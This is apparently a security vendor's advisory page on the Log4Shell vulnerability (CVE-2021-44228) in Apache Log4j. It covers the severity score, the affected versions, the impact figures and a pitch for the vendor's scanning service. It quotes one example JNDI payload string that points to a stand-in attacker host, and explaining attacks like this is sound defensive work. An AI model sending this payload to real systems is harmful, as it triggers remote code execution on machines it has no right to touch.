CVE-2021-44228: Log4Shell

Score: 10
CRITICAL
Published: 2021-12-10Affected: Apache Log4j 2.x < 2.15.0CWE-917 β†—

What is Log4Shell (CVE-2021-44228)?

A critical remote code execution vulnerability in Apache Log4j 2, the most widely used Java logging framework. Attackers can execute arbitrary code by sending a crafted log message containing a JNDI lookup string (${jndi:ldap://attacker.com/a}). The vulnerability affects virtually every Java application using Log4j 2.x.

Impact & Exploitation

Affected an estimated 93% of enterprise cloud environments. Exploited within hours of disclosure by cryptominers, ransomware, and nation-state actors. Over 800,000 attacks detected in the first 72 hours.

Related Resources

πŸ“– Security Guides

πŸ›‘οΈ Notable Vulnerabilities

πŸ”— External References

Precogs Logo

Precogs Research

This vulnerability intelligence report was analyzed and enriched by the Precogs AI Security Team. Our researchers continuously monitor emerging threats across AI code, LLM pipelines, and binary architectures to ensure accurate real-time remediation guidance.

Base Score

CVSS10
SeverityCRITICAL
CWECWE-917
Published2021-12-10

Tags

javarcezero-daysupply-chain

Quick Links

Is your system affected?

Precogs AI detects Log4Shell in compiled binaries and firmware β€” even without source code.

Request Deep Analysis

Is Your System Still Exposed to Critical CVEs?

Vulnerabilities like CVE-2021-44228 Log4Shell don’t just exist in source code β€” they persist in compiled binaries, containers, and embedded systems. Precogs AI detects vulnerable components across your entire stack β€” even when source code isn’t available.

Request Deep AnalysisBook a demo